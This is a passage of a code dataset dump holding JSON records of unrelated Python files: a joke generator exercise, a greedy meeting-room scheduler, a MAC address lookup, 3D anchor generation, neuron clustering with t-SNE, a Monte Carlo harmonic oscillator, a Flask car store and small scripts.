repetitions = bool(input('Avoid repeats in jokes? Any non-empty value gives True: '))\nget_jokes(nouns, adverbs, adjectives, flag1=repetitions)\nfor joke in list_of_jokes:\n    print(*joke)\n","repo_name":"BadRussianSPb/Python_on_GeekBrains","sub_path":"Pavlov_Egor_Lesson_3/Pavlov_Egor_dz_3_5.py","file_name":"Pavlov_Egor_dz_3_5.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"9621718829","text":"# Meeting room scheduling\n\nn = int(input())\nmeeting = [list(map(int, input().split())) for _ in range(n)]\nmeeting.sort(key=lambda x: (x[1], x[0]))\n\n# Always take the first meeting, since the list is sorted by end time\nans = 1\nmeeting_end = meeting[0][1]\nfor i in range(1, n):\n    if meeting[i][0] >= meeting_end:\n        ans += 1\n        meeting_end = meeting[i][1]\nprint(ans)","repo_name":"niinp28/algorithm","sub_path":"BOJ/BOJ1931.py","file_name":"BOJ1931.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36804120405","text":"import matplotlib.pyplot as plt\n\n# Defining variables\nfatias = [6, 4, 10]\natividades = ['X', 'Y', 'Z']\ncolunas = ['r', 'm', 'y']\n\n# Creating a chart\nplt.pie(fatias, labels = atividades, colors = colunas, startangle = 90, shadow = True, explode = (0.1, 0, 0))\n\nplt.show()","repo_name":"ricdtaveira/poo-python-ifce-p7","sub_path":"aula13/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"41312794347","text":"#Layer 2 MAC (physical) addressing\nfrom netaddr import *\ndef finding_all_details_of_MAC(addr):\n\n    #Instances of the EUI class are used to represent MAC addresses\n    mac=EUI(addr)\n\n    #methods to provide info on OUI and other organizational info\n    print(\"OUI-:\",mac.info)\n    oui=mac.oui\n    print(\"Organization-:\",oui.registration().org)\n    print(\"Registration address\",oui.registration().address)\n\n\n\nif __name__ == \"__main__\":\n    addr=input(\"Enter your MAC(Physical address)-:\")\n    finding_all_details_of_MAC(addr)\n    #80-32-53-86-08-6B\n    ","repo_name":"MOHANRAJ264/PYTHON-NETWORKING","sub_path":"Netaddr_folder/layer3_Mac.py","file_name":"layer3_Mac.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1121437104","text":"import numpy as np\n\nclass AnchorGenerator:\n    @property\n    def class_name(self):\n        raise NotImplementedError\n\n    @property\n    def num_anchors_per_localization(self):\n        raise NotImplementedError\n\n    def generate(self, feature_map_size):\n        raise NotImplementedError\n\n    @property \n    def ndim(self):\n        raise NotImplementedError\n\n\nclass AnchorGeneratorStride(AnchorGenerator):\n    def __init__(self,\n                 sizes=[1.6, 3.9, 1.56],\n                 anchor_strides=[0.4, 0.4, 1.0],\n                 anchor_offsets=[0.2, -39.8, -1.78],\n                 rotations=[0, np.pi / 2],\n                 class_name=None,\n                 match_threshold=-1,\n                 unmatch_threshold=-1,\n                 custom_values=(),\n                 dtype=np.float32):\n        super().__init__()\n        self._sizes = sizes\n        self._anchor_strides = anchor_strides\n        self._anchor_offsets = anchor_offsets\n        self._rotations = rotations\n        self._dtype = dtype\n        self._class_name = class_name\n        self.match_threshold = match_threshold\n        self.unmatch_threshold = unmatch_threshold\n        self._custom_values = custom_values\n\n    @property\n    def class_name(self):\n        return self._class_name\n\n    @property\n    def num_anchors_per_localization(self):\n        num_rot = len(self._rotations)\n        num_size = np.array(self._sizes).reshape([-1, 
3]).shape[0]\n return num_rot * num_size\n\n def create_anchors_3d_stride(self,feature_size,\n sizes=[1.6, 3.9, 1.56],\n anchor_strides=[0.4, 0.4, 0.0],\n anchor_offsets=[0.2, -39.8, -1.78],\n rotations=[0, np.pi / 2],\n dtype=np.float32):\n \"\"\"\n Args:\n feature_size: list [D, H, W](zyx)\n sizes: [N, 3] list of list or array, size of anchors, xyz\n\n Returns:\n anchors: [*feature_size, num_sizes, num_rots, 7] tensor.\n \"\"\"\n # almost 2x faster than v1\n x_stride, y_stride, z_stride = anchor_strides\n x_offset, y_offset, z_offset = anchor_offsets\n z_centers = np.arange(feature_size[0], dtype=dtype)\n y_centers = np.arange(feature_size[1], dtype=dtype)\n x_centers = np.arange(feature_size[2], dtype=dtype)\n z_centers = z_centers * z_stride + z_offset\n y_centers = y_centers * y_stride + y_offset\n x_centers = x_centers * x_stride + x_offset\n sizes = np.reshape(np.array(sizes, dtype=dtype), [-1, 3])\n rotations = np.array(rotations, dtype=dtype)\n rets = np.meshgrid(\n x_centers, y_centers, z_centers, rotations, indexing='ij')\n tile_shape = [1] * 5\n tile_shape[-2] = int(sizes.shape[0])\n for i in range(len(rets)):\n rets[i] = np.tile(rets[i][..., np.newaxis, :], tile_shape)\n rets[i] = rets[i][..., np.newaxis] # for concat\n sizes = np.reshape(sizes, [1, 1, 1, -1, 1, 3])\n tile_size_shape = list(rets[0].shape)\n tile_size_shape[3] = 1\n sizes = np.tile(sizes, tile_size_shape)\n rets.insert(3, sizes)\n ret = np.concatenate(rets, axis=-1)\n return np.transpose(ret, [2, 1, 0, 3, 4, 5])\n def generate(self, feature_map_size):\n res = self.create_anchors_3d_stride(\n feature_map_size, self._sizes, self._anchor_strides,\n self._anchor_offsets, self._rotations, self._dtype)\n if len(self._custom_values) > 0:\n custom_ndim = len(self._custom_values)\n custom = np.zeros([*res.shape[:-1], custom_ndim])\n custom[:] = self._custom_values\n res = np.concatenate([res, custom], axis=-1)\n return res\n\n def generate_anchors(self,feature_map_size):\n ndim = len(feature_map_size)\n anchors = self.generate(feature_map_size)\n anchors = anchors.reshape([*feature_map_size, -1, self.ndim])\n anchors = anchors.transpose(ndim, *range(0, ndim), ndim + 1)\n anchors = anchors.reshape(-1, self.ndim)\n return anchors\n @property \n def ndim(self):\n return 7 + len(self._custom_values)\n\n @property \n def custom_ndim(self):\n return len(self._custom_values)\n","repo_name":"wangguojun2018/PointPillars_Tensorrt","sub_path":"second/core/anchor_generator.py","file_name":"anchor_generator.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"21"} +{"seq_id":"40316942980","text":"import matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport seaborn as sns\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import silhouette_score\n\nfrom Processing.calculate_spike_rate import calculate_spike_rate_kernel_smoothing\nfrom Processing.process_raw_trace import get_spike_times_for_cc\n\nfrom Visualisation.metrics_plots import plot_metrics_against_clusters\n\n\ndef get_frequency_components(abf_objects):\n freq_components = []\n indexes = [i for i in range(0, 1000, 10)]\n for abf_obj in abf_objects:\n for sweep in range(abf_obj.sweepCount):\n abf_obj.setSweep(sweep)\n spike_times = get_spike_times_for_cc(abf_obj)\n if len(spike_times) > 1:\n kds_data = calculate_spike_rate_kernel_smoothing(spike_times, max(abf_obj.sweepX))\n kds_data = [kds_data[i] for i 
in indexes]\n                freq_components.append(kds_data)\n    return freq_components\n\n\ndef calculate_distances_between_categories(tsne_output, categories):\n    distances = np.zeros(shape=(len(categories), len(categories)))\n    same_categories = np.zeros(shape=(len(categories), len(categories)))\n    for i, row in enumerate(distances):\n        for j, val in enumerate(row):\n            if categories[i] == categories[j]:\n                same_categories[i, j] = 1\n            distances[i, j] = ((tsne_output[\"tsne-2d-one\"][i]-tsne_output[\"tsne-2d-one\"][j])**2 + (tsne_output[\"tsne-2d-two\"][i]-tsne_output[\"tsne-2d-two\"][j])**2)**0.5\n    distances_between_categories = 0\n    distances_between_all = 0\n    num_same_category = 0\n    for i, row in enumerate(distances):\n        for j, val in enumerate(row):\n            if j <= i:\n                pass\n            else:\n                if same_categories[i, j] == 1:\n                    num_same_category += 1\n                    distances_between_categories += val\n                distances_between_all += val\n    print(f\"Distances between categories = {distances_between_categories/num_same_category}\")\n    total_comparisons = ((len(categories)-1)/(len(categories)*2))*(len(categories)**2)\n    print(f\"Distances between all = {distances_between_all/total_comparisons}\")\n\n\ndef tsne_on_full_vector(vectors, neuron_names, labels=None, labels2=None):\n    tsne = TSNE(n_components=2, n_iter=1000, perplexity=3)\n    for i, vector in enumerate(vectors):\n        for j, metric in enumerate(vector):\n            if metric is None:\n                vectors[i, j] = 0\n    tsne_results = tsne.fit_transform(vectors)\n\n    tpd = {}\n\n    tpd['tsne-2d-one'] = tsne_results[:, 0]\n    tpd['tsne-2d-two'] = tsne_results[:, 1]\n    plt.figure(figsize=(6, 6))\n\n    if labels is not None:\n        p1 = sns.scatterplot(\n            x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n            hue=labels,\n            palette=sns.color_palette(\"hls\", len(set(labels))),\n            data=tpd,\n            legend=True,\n            alpha=1\n        )\n    else:\n        p1 = sns.scatterplot(\n            x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n            data=tpd,\n            legend=True,\n            alpha=1\n        )\n    if neuron_names is not None:\n        for line in range(len(vectors)):\n            p1.text(tpd['tsne-2d-one'][line] + 0.01, tpd['tsne-2d-two'][line],\n                    neuron_names[line], horizontalalignment='left',\n                    size='small', color='black', weight='bold')\n    plt.show()\n    plt.figure(figsize=(6, 6))\n\n    if labels2 is not None:\n        p1 = sns.scatterplot(\n            x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n            hue=labels2,\n            palette=sns.color_palette(\"hls\", len(set(labels2))),\n            data=tpd,\n            alpha=1\n        )\n    plt.legend(bbox_to_anchor=(1.01, 1), borderaxespad=0)\n    plt.tight_layout()\n\n    plt.show()\n    print(\"Original labels\")\n    calculate_distances_between_categories(tsne_output=tpd, categories=labels)\n    print(\"New labels\")\n    calculate_distances_between_categories(tsne_output=tpd, categories=labels2)\n    return tpd\n\n\ndef do_tsne_on_kdfs(kdfs, neuron_names, labels=None):\n    tsne = TSNE(n_components=2, n_iter=1000, perplexity=3)\n    tsne_results = tsne.fit_transform(kdfs)\n\n    tpd = {}\n\n    tpd['tsne-2d-one'] = tsne_results[:, 0]\n    tpd['tsne-2d-two'] = tsne_results[:, 1]\n    plt.figure(figsize=(6, 6))\n    plt.title(f\"T-SNE results on KDFs\")\n\n    if labels is not None:\n        p1 = sns.scatterplot(\n            x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n            hue=labels,\n            palette=sns.color_palette(\"hls\", len(set(labels))),\n            data=tpd,\n            legend=\"brief\",\n            alpha=1\n        )\n    else:\n        p1 = sns.scatterplot(\n            x=\"tsne-2d-one\", y=\"tsne-2d-two\",\n            data=tpd,\n            legend=\"full\",\n            alpha=1\n        )\n    # for line in range(len(kdfs)):\n    #     p1.text(tpd['tsne-2d-one'][line] + 0.01, tpd['tsne-2d-two'][line],\n    #             neuron_names[line], horizontalalignment='left',\n    #             size='small', color='black', weight='bold')\n    print(\"KDF labels\")\n    
calculate_distances_between_categories(tpd, labels)\n    plt.show()\n\n\ndef knn_on_ifc_initial(vectors):\n    ifc = [vector[1] for vector in vectors]\n    finitial = [vector[2] for vector in vectors]\n\n    ifc_subset = []\n    finitial_subset = []\n    labels_full = [None for i in range(len(ifc))]\n    for i, ifcc, finit in zip(range(len(ifc)), ifc, finitial):\n        if ifcc >= 40:\n            labels_full[i] = 3\n        else:\n            ifc_subset.append(ifcc)\n            finitial_subset.append(finit)\n\n    # Finding optimal cluster num\n    sil = []\n    for i in range(2, 5):\n        nbrs = KMeans(n_clusters=i, n_init=20).fit([[f, ifc_v] for f, ifc_v in zip(finitial_subset, ifc_subset)])\n        labels_new = nbrs.labels_\n        sil.append(silhouette_score([[f, ifc_v] for f, ifc_v in zip(finitial_subset, ifc_subset)], labels_new, metric='euclidean'))\n\n    # Doing this number of clusters\n    optimal_num = sil.index(min(sil)) + 1\n    nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[f, ifc_v] for f, ifc_v in zip(finitial_subset, ifc_subset)])\n    labels_new = nbrs.labels_\n\n    i = 0\n    for j, l in enumerate(labels_full):\n        if l is None:\n            labels_full[j] = labels_new[i]\n            i += 1\n        else:\n            labels_full[j] = max(labels_new) + 1\n    return labels_full\n\n\ndef knn_on_strong_weak(response_vectors):\n    max_v = [vector[4] for vector in response_vectors]\n    mean = [vector[5] for vector in response_vectors]\n    B_frac = [vector[3] for vector in response_vectors]\n\n    # Finding optimal cluster num\n    sil = []\n    for i in range(2, 5):\n        nbrs = KMeans(n_clusters=i, n_init=20).fit([[mx, mn, bf] for mx, mn, bf in zip(max_v, mean, B_frac)])\n        labels = nbrs.labels_\n        sil.append(silhouette_score([[mx, mn, bf] for mx, mn, bf in zip(max_v, mean, B_frac)], labels,\n                                    metric='euclidean'))\n\n    # Doing this number of clusters\n    optimal_num = sil.index(min(sil)) + 2\n    nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[mx, mn, bf] for mx, mn, bf in zip(max_v, mean, B_frac)])\n    labels = nbrs.labels_\n\n    return labels\n\n\ndef knn_on_slow_fast_onset(response_vectors):\n    m = [vector[6] for vector in response_vectors]\n    tau = [vector[8] for vector in response_vectors]\n    c = [vector[7] for vector in response_vectors]\n\n    sil = []\n    for i in range(2, 5):\n        nbrs = KMeans(n_clusters=i, n_init=20).fit([[cc, mm, t] for cc, mm, t in zip(c, m, tau)])\n        labels = nbrs.labels_\n        sil.append(silhouette_score([[cc, mm, t] for cc, mm, t in zip(c, m, tau)], labels,\n                                    metric='euclidean'))\n\n    # Doing this number of clusters\n    optimal_num = sil.index(min(sil)) + 2\n    nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[cc, mm, t] for cc, mm, t in zip(c, m, tau)])\n    labels = nbrs.labels_\n\n    return labels\n\n\ndef knn_on_slow_fast_adapt_accel(response_vectors):\n    B_frac = [vector[3] for vector in response_vectors]\n    m = [vector[6] for vector in response_vectors]\n    tau = [vector[8] for vector in response_vectors]\n\n    sil = []\n    for i in range(2, 5):\n        nbrs = KMeans(n_clusters=i, n_init=20).fit([[bf, mm, t] for bf, mm, t in zip(B_frac, m, tau)])\n        labels = nbrs.labels_\n        sil.append(silhouette_score([[bf, mm, t] for bf, mm, t in zip(B_frac, m, tau)], labels,\n                                    metric='euclidean'))\n\n    # Doing this number of clusters\n    optimal_num = sil.index(min(sil)) + 2\n    nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit([[bf, mm, t] for bf, mm, t in zip(B_frac, m, tau)])\n    labels = nbrs.labels_\n\n    return labels\n\n\ndef knn_full_response_vector(vectors):\n    vectors = np.delete(vectors, 0, 1)\n\n    sil = []\n    for i in range(2, 5):\n        nbrs = KMeans(n_clusters=i, n_init=20).fit(vectors)\n        labels = nbrs.labels_\n        sil.append(silhouette_score(vectors, 
labels, metric='euclidean'))\n\n    # Doing this number of clusters\n    optimal_num = sil.index(min(sil))\n    nbrs = KMeans(n_clusters=optimal_num, n_init=20).fit(vectors)\n    labels = nbrs.labels_\n\n    return labels\n\n\ndef agglomerative_clustering_on_vectors(response_vectors):\n    ifc = [vector[1] for vector in response_vectors]\n    finitial = [vector[2] for vector in response_vectors]\n    data = [[fin, ifcc] for fin, ifcc in zip(finitial, ifc)]\n    aggl = AgglomerativeClustering(distance_threshold=0, n_clusters=None).fit(data)\n    return aggl\n\n\ndef all_clusters(vectors, neuron_names):\n    labels1 = knn_on_ifc_initial(vectors)\n    plot_metrics_against_clusters(vectors, neuron_names, labels1, \"KNN Adapt-Accel\")\n\n    labels2 = knn_on_strong_weak(vectors)\n    plot_metrics_against_clusters(vectors, neuron_names, labels2, \"KNN Strong vs Weak\")\n\n    labels3 = knn_on_slow_fast_onset(vectors)\n    plot_metrics_against_clusters(vectors, neuron_names, labels3, \"KNN Slow vs Fast Onset\")\n\n    labels4 = knn_on_slow_fast_adapt_accel(vectors)\n    plot_metrics_against_clusters(vectors, neuron_names, labels4, \"KNN Slow vs Fast Adapt-Accel\")\n    results = pd.DataFrame([labels1, labels2, labels3, labels4], columns=neuron_names)\n    return results\n\n","repo_name":"syorkp/granule_categories","sub_path":"Analysis/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":10235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12201692441","text":"with open('input.txt') as f:\n    raw_input = f.read()\n\nlines = [x for x in raw_input.split('\\n') if x != '']\n\ndef part1():\n    valid = 0\n    for line in lines:\n        counts, letter, pw = line.split(' ')\n        [min_count, max_count] = [int(x) for x in counts.split('-')]\n        letter = letter[0]\n        letter_count = pw.count(letter)\n        if letter_count >= min_count and letter_count <= max_count:\n            valid += 1\n    print(valid)\n\ndef part2():\n    valid = 0\n    for line in lines:\n        indices, letter, pw = line.split(' ')\n        [i1, i2] = [int(x) for x in indices.split('-')]\n        letter = letter[0]\n        if (pw[i1-1] == letter) ^ (pw[i2-1] == letter):\n            valid += 1\n    print(valid)\n\npart1()\npart2()","repo_name":"hairylunch/adventofcode2020","sub_path":"02/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26991971583","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 3.\n# See the file http://www.gnu.org/licenses/gpl.txt\n\nfrom pisi.actionsapi import get, pisitools, shelltools\n\nWorkDir = \".\"\nNoStrip = [\"/\"]\n\ndef install():\n    pisitools.dodir (\"/opt/Ferdi\")\n    pisitools.insinto(\"/opt/Ferdi\", \"ferdi-5.8.1/*\")\n    pisitools.dosym(\"/opt/Ferdi/ferdi\", \"/usr/bin/ferdi\")\n\n    \n    ","repo_name":"pisilinux/pisilife-2","sub_path":"network/chat/ferdi/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
+{"seq_id":"42842850295","text":"from math import asin, sin, pi\n\ndef snell_descartes(indice_1, indice_2, angulo_incidente):\n    ''' returns the refraction angle of a light ray,\n    in degrees, from the refractive indices of the\n    two media and the incidence angle in degrees '''\n    \n    # convert the incidence angle to radians\n    angulo_incidente *= pi / 180\n    \n    # compute the sine of the incidence angle\n    
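# Snell-Descartes law: indice_1 * sin(theta_incidence) = indice_2 * sin(theta_refraction).\n    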
seno_incidente = sin(angulo_incidente)\n    \n    # compute the sine of the refraction angle via the Snell-Descartes law\n    seno_refracao = indice_1 / indice_2 * seno_incidente\n    \n    # recover the refraction angle from its sine and convert to degrees\n    angulo_refracao = asin(seno_refracao) * 180 / pi\n    \n    # return the angle in degrees\n    return angulo_refracao\n    \n    ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_233/ch117_2020_09_30_20_47_23_494194.py","file_name":"ch117_2020_09_30_20_47_23_494194.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"33627940653","text":"# MONTE CARLO TEST WITH HARMONIC OSCILLATOR IN 1D\n\n# The previous code allowed us to test the algorithm and verify the properties\n# of the local kinetic energy with some plots. However, the variational parameter\n# in the WF had to be changed manually. Now, we actually want to automate the \n# variational procedure to find the best value of alpha via a minimisation of the energy\n\nimport time\nimport numpy as np\nfrom numba import njit\nimport math as m\nimport matplotlib.pyplot as plt\nimport random as rd\n\nN_steps = 50000   # Simulation steps\nN_eq = 5000\n\n# Function to compute the WF\n\n@njit \ndef WF(x, alpha):\n    \n    # We can forget about the normalisation, it comes \"for free\" in MC\n    \n    Psi = m.exp(- x**2 / (2*alpha**2) )  #* 1 / (2*m.pi*alpha**2)**0.5\n    \n    return Psi\n\n# FUNCTION FOR THE METROPOLIS ALGORITHM\n\n@njit\ndef metropolis(x, N_acc, wf2_old, Delta, alpha):\n\n    # First, we need to build a new configuration\n    # We start from the initial one\n\n    new_x = x \n\n    # Variation of position\n\n    rand = rd.uniform(0,1)              # Pick random number\n    new_x = x - Delta * (rand - 0.5)    # Set new coordinate\n\n    # Now, we must evaluate the acceptance ratio using the ratio of the square moduli of the WFs\n\n    wf2_new = WF(new_x, alpha)**2\n\n    acc = wf2_new / wf2_old\n\n    # Decide acceptance\n\n    xi = rd.uniform(0,1)\n\n    wf2 = wf2_old\n\n    if xi < acc: # new_part becomes part, we accept the MC move\n\n        x = new_x\n\n        N_acc += 1 # Increase the number of accepted moves\n\n        wf2 = wf2_new\n\n    return x, N_acc, wf2\n\n# FUNCTION TO COMPUTE THE POTENTIAL ENERGY \n\n@njit\ndef p_energy(x):\n    \n    p_en = 0.5 * x**2\n    \n    return p_en\n\n# FUNCTION TO COMPUTE THE KINETIC ENERGY\n\n@njit\ndef k_energy(x, alpha):\n    \n    k_en = - 0.5 * (-1 / alpha**2 + x**2 / alpha**4)  \n    \n    return k_en\n\n# FUNCTION TO PERFORM THE ITERATIVE PROCEDURE\n\n@njit\ndef montecarlo(x, alpha):\n    \n    Delta = 4 # Value of parameter for displacement\n\n    # First, the equilibration steps\n\n    wf2 = WF(x,alpha)\n\n    N_acc1 = 0\n    # cum_en = 0\n    # cum_en2 = 0 \n    # std = 1 \n    # mean = 1\n    # s = 0\n    \n    # Equilibration with std (NB does not work well with adaptive scheme for delta!!)\n    \n    # while std / mean > 0.02: # stop the equilibration when variance is smaller than 1%\n    \n    #     # An adaptive scheme for Delta would be needed\n\n    #     x, N_acc1, wf2 = metropolis(x, N_acc1, wf2, Delta, alpha)\n        \n    #     # Instead of using a chosen number of equilibration steps, we have to\n    #     # use the convergence of the energy to stop the procedure \n        \n    #     # Cumulate the observables\n    #     loc_en = k_energy(x, alpha) + p_energy(x)\n    #     cum_en += loc_en\n    #     cum_en2 += loc_en**2\n        \n    #     if s >= 2 and s%5 == 0:\n        \n    #         mean = cum_en / s\n    #         std = m.sqrt( 1 / (s-1) * ( cum_en2 / s - mean**2) )\n        \n    #     s += 1\n        \n    #     # An adaptive scheme for Delta \n        \n    #     if s != 0 and s%5 == 0:\n        \n    #         if N_acc1 / s >= 0.55:\n            \n    #             Delta += 0.05 * 4\n            \n    #         elif N_acc1 / s <= 0.45:\n            \n    #             Delta -= 0.05 * 4\n    \n    # Equilibration with chosen steps \n    \n    for s in range(0,N_eq): # run a fixed number of equilibration steps\n    \n        x, N_acc1, wf2 = metropolis(x, N_acc1, wf2, Delta, alpha)\n        \n        # An adaptive scheme for Delta \n        \n        
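# (Target roughly 50% acceptance: widen the step when accepting too often, shrink it otherwise.)\n        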
if s != 0 and s%5 == 0:\n        \n            if N_acc1 / s >= 0.55:\n            \n                Delta += 0.05 * 4\n            \n            elif N_acc1 / s <= 0.45:\n            \n                Delta -= 0.05 * 4\n    \n    # If we do things in the following way, we choose the length of the \n    # simulation. Alternatively we can choose again the target accuracy\n    # The problem in doing so is that for some values of the variational \n    # parameter (too far from exact) a high accuracy may take forever to reach\n\n    N_acc2 = 0\n    cum_en = 0  # Reset cumulative variable\n    cum_en2 = 0 # Reset cumulative variable\n\n    for s in range(0, N_steps):\n\n        x, N_acc2, wf2 = metropolis(x, N_acc2, wf2, Delta, alpha)\n        \n        # An adaptive scheme for Delta \n        \n        if s != 0 and s%5 == 0:\n        \n            if N_acc2 / s >= 0.55:\n            \n                Delta += 0.05 * 4\n            \n            elif N_acc2 / s <= 0.45:\n            \n                Delta -= 0.05 * 4\n        \n        loc_en = k_energy(x, alpha) + p_energy(x)\n        cum_en += loc_en\n        cum_en2 += loc_en**2\n    \n    mean_en = cum_en / N_steps\n    std_en = m.sqrt( 1 / (N_steps-1) * ( cum_en2 / N_steps - mean_en**2) )\n\n    accf = N_acc2/N_steps\n    \n    return accf, mean_en, std_en\n\n# FUNCTION TO IMPLEMENT THE VARIATIONAL PROCEDURE\n\n# Option 1: Re-run the MC simulation using a different variational parameter \n# each time. This has the advantage of working in any range of parameters but \n# requires us to run the simulation multiple times\n\n@njit\ndef variational_1(x):\n    \n    alpha = np.arange(0.3, 3, 0.05) # vector for parameters to try\n    \n    l = len(alpha)\n    \n    accept = np.zeros(l)\n    mean = np.zeros(l)\n    std = np.zeros(l)  \n    \n    # run the simulation for all the parameters \n    \n    for i in range(0, l):\n        \n        accept[i], mean[i], std[i] = montecarlo(x, alpha[i])\n    \n    return alpha, accept, mean, std\n\n# Option 2: Run the simulation only once and use reweighting to compute the\n# result for different variational parameters. It has the advantage of running\n# a single simulation but only works in a range of parameters (of course, since\n# we usually have an idea of the result, this is the preferred choice)\n
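# (Reweighting sketch, not implemented below: with samples x_i drawn from |psi_alpha0|^2,\n#  estimate E(alpha) as sum_i w_i * E_L(x_i; alpha) / sum_i w_i,\n#  where w_i = |psi_alpha(x_i)|^2 / |psi_alpha0(x_i)|^2.)\n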
@njit\ndef variational_2(x):\n    \n    alpha = np.arange(0.8, 1.2, 0.01) # vector for parameters to try\n    \n    # The reweighting step is not written yet; fail loudly rather than hit a NameError\n    raise NotImplementedError\n\n\n# EXECUTION OF THE PROCEDURE\n\n# Start procedure timing\n\nstart = time.time()\n\n# Set initial conditions\n\nx = 0\n\n# Run the MC simulation\n\nalpha, accept, mean, std = variational_1(x)\n\nprint(\"\\n The energy is {} pm {}\".format(np.min(mean), std[np.argmin(mean)]))\n\n# Plot the energy as a function of the variational parameter\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.errorbar(alpha, mean, std, elinewidth=1, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\", label=\"Simulation Result\")\nplt.grid()\nplt.axhline(0.5, linewidth = 0.8, c= \"red\", label=\"Exact Value\")\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Energy\", fontsize=14)\nplt.title(\"Energy\", fontsize=18)\nplt.legend()\nplt.savefig(\"Energies.png\", dpi = 300)\n\n# Plot the std as a function of alpha\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.plot(alpha, std, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\")\nplt.grid()\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Std\", fontsize=14)\nplt.title(\"Standard Deviation\", fontsize=18)\nplt.savefig(\"Standard Deviation.png\", dpi = 300)\n\n# Plot the acceptance probability as a function of alpha\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.plot(alpha, accept, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\")\nplt.grid()\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(r\"$p_{acc}$\", fontsize=14)\nplt.title(\"Acceptance probability\", fontsize=18)\nplt.savefig(\"Acceptance Probability.png\", dpi = 300)\n\n# End procedure timing\n\nend = time.time()\n\nprint(\"\\n The simulation took me {} seconds\".format(end-start))\n","repo_name":"NerusSkyhigh/computationalphysics2021","sub_path":"Exercise_4/Warmup_HO/Warmup_HO_2.py","file_name":"Warmup_HO_2.py","file_ext":"py","file_size_in_byte":7891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1183581482","text":"import json\nfrom datetime import datetime\n\n# the following class is used to represent a list of cars\nclass Cars:\n    car_list = []\n\n    def __init__(self):\n        self.car_list = []\n    def create_car(self, id, make, module, year):\n        write_message(\"create_car called\")\n        new_car = {'id': id, 'make': make, 'module': module, 'year': year}\n        if self.get_car(id):\n            write_message(\"POST /api/v1/objects/cars already exists\")\n            return None\n        self.car_list.append(new_car)\n        write_message(\"POST /api/v1/objects/cars\" + str(new_car))\n        return json.dumps(new_car)\n    def get_car(self, id):\n        write_message(\"get_car called\")\n        for car in self.car_list:\n            if car['id'] == 
id:\n                car['make'] = make\n                car['module'] = module\n                car['year'] = year\n                write_message(\"PUT /api/v1/objects/cars\" + str(car))\n                return json.dumps(car)\n        write_message(\"PUT /api/v1/objects/cars not found\")\n        return None\n\n    def delete_car(self, id):\n        write_message(\"delete_car called\")\n        for car in self.car_list:\n            if car['id'] == id:\n                self.car_list.remove(car)\n                write_message(\"DELETE /api/v1/objects/cars\" + str(car))\n                return json.dumps(car)\n        write_message(\"DELETE /api/v1/objects/cars not found\")\n        return None\n\n\ndef write_message(message):\n    to_save = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + ': ' + message + '\\n'\n    with open('message.txt', 'a') as f:\n        # write the message with time stamp\n        f.write(to_save)\n    print(to_save)\n","repo_name":"tl11bi/terraform-provider-connor-example","sub_path":"terraform_mastercard_api_example/python-flask-docker/src/cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23189893213","text":"\"\"\"\nProvides the following functions:\n\n* :func:`bilateral_methods`\n* :func:`multilateral_methods`\n\nWith the following bilateral price index methods:\n\n* Carli, Jevons, Dutot, Laspeyres, Paasche, geom_Laspeyres, geom_Paasche,\n  Drobish, Marshall Edgeworth, Palgrave, Fisher, Tornqvist, Walsh, Sato Vartia,\n  Geary Khamis, Rothwell.\n\nand the following multilateral price index methods:\n\n* The GEKS method paired with a bilateral method, the Geary-Khamis method (GK)\n  and Time Dummy methods 